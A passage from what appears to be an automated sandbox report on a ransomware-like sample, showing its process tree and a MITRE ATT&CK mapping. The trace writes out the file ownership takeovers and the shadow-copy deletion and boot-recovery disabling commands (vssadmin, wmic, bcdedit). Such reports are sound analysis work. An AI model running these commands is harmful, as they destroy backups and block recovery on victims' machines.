    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "cab1.cab" -nobanner
    3⤵
    PID:1984
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "cab1.cab" -nobanner
      4⤵
      PID:316
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1228
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Users\All Users\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\cab1.cab""
  2⤵
  PID:1912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\cab1.cab" /E /G Admin:F /C
    3⤵
    PID:1192
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\cab1.cab"
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "cab1.cab" -nobanner
    3⤵
    PID:216
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "cab1.cab" -nobanner
      4⤵
      PID:1480
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2028
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""
  2⤵
  PID:1932
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C
    3⤵
    PID:1424
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"
    3⤵
    PID:1364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "cryptocme2.sig" -nobanner
    3⤵
    PID:1152
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "cryptocme2.sig" -nobanner
      4⤵
      PID:1012
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1532
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""
  2⤵
  PID:1472
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C
    3⤵
    PID:828
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"
    3⤵
    PID:316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "pmd.cer" -nobanner
    3⤵
    PID:1984
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "pmd.cer" -nobanner
      4⤵
      PID:1584
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:836
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""
  2⤵
  PID:1280
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C
    3⤵
    PID:1080
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"
    3⤵
    PID:888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "email_initiator.gif" -nobanner
    3⤵
    PID:1876
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "email_initiator.gif" -nobanner
      4⤵
      PID:1428
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1864
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""
  2⤵
  PID:1088
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C
    3⤵
    PID:1716
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"
    3⤵
    - Modifies file permissions
    PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "pdf.gif" -nobanner
    3⤵
    PID:204
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "pdf.gif" -nobanner
      4⤵
      PID:1808
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif""
  2⤵
  PID:2044
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C
    3⤵
    PID:212
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"
    3⤵
    PID:1228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "server_issue.gif" -nobanner
    3⤵
    PID:1240
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "server_issue.gif" -nobanner
      4⤵
      PID:1316
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:796
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""
  2⤵
  PID:1944
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"
    3⤵
    PID:1548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner
    3⤵
    PID:216
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner
      4⤵
      PID:1912
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1192
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""
  2⤵
  PID:1328
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C
    3⤵
    PID:1012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"
    3⤵
    PID:1936
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "CourierStd.otf" -nobanner
    3⤵
    PID:1152
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "CourierStd.otf" -nobanner
      4⤵
      PID:1932
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1520
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""
  2⤵
  PID:1088
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C
    3⤵
    PID:212
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"
    3⤵
    PID:836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "zx______.pfm" -nobanner
    3⤵
    PID:1316
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "zx______.pfm" -nobanner
      4⤵
      PID:1240
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:796
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt""
  2⤵
  PID:1076
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"
    3⤵
    - Modifies file permissions
    PID:1864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner
    3⤵
    PID:1912
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner
      4⤵
      PID:216
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2012
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""
  2⤵
  PID:1080
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"
    3⤵
    PID:1224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "can32.clx" -nobanner
    3⤵
    PID:204
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "can32.clx" -nobanner
      4⤵
      PID:1968
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1716
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""
  2⤵
  PID:1364
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"
    3⤵
    PID:1472
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "symbol.txt" -nobanner
    3⤵
    PID:1984
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "symbol.txt" -nobanner
      4⤵
      PID:828
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:316
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""
  2⤵
  PID:1856
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"
    3⤵
    - Modifies file permissions
    PID:528
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "SYMBOL.TXT" -nobanner
    3⤵
    PID:1876
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "SYMBOL.TXT" -nobanner
      4⤵
      PID:1944
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2028
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""
  2⤵
  PID:888
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C
    3⤵
    PID:1932
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"
    3⤵
    PID:1424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "behavior.xml" -nobanner
    3⤵
    PID:204
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "behavior.xml" -nobanner
      4⤵
      PID:2000
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1436
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""
  2⤵
  PID:2004
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1240
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"
    3⤵
    PID:1704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1984
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1696
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:208
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat""
  2⤵
  PID:1728
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C
    3⤵
    PID:528
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat"
    3⤵
    PID:1944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "qmgr1.dat" -nobanner
    3⤵
    PID:1876
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "qmgr1.dat" -nobanner
      4⤵
      PID:1324

C:\Windows\system32\taskeng.exe
taskeng.exe {14CC6DD1-B4BE-46EE-8289-670EA616CD34} S-1-5-21-1405931862-909307831-4085185274-1000:GZAATBZA\Admin:Interactive:[1]
1⤵
PID:840
- C:\Windows\SYSTEM32\cmd.exe
  C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\RRXtp1dC.bat"
  2⤵
  PID:1300
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:1264
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic SHADOWCOPY DELETE
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1984
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1584
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1764
- - C:\Windows\system32\schtasks.exe
    SCHTASKS /Delete /TN DSHCA /F
    3⤵
    PID:888

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1516

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/872-61-0x0000000074230000-0x00000000747DB000-memory.dmp

Filesize
5.7MB

Download
memory/872-64-0x00000000021C1000-0x00000000021C2000-memory.dmp

Filesize
4KB

Download
memory/872-62-0x00000000021C0000-0x00000000021C1000-memory.dmp

Filesize
4KB

Download
memory/872-65-0x00000000021C2000-0x00000000021C4000-memory.dmp

Filesize
8KB

Download
memory/872-63-0x0000000074230000-0x00000000747DB000-memory.dmp

Filesize
5.7MB

Download
memory/1232-54-0x0000000075F71000-0x0000000075F73000-memory.dmp

Filesize
8KB

Download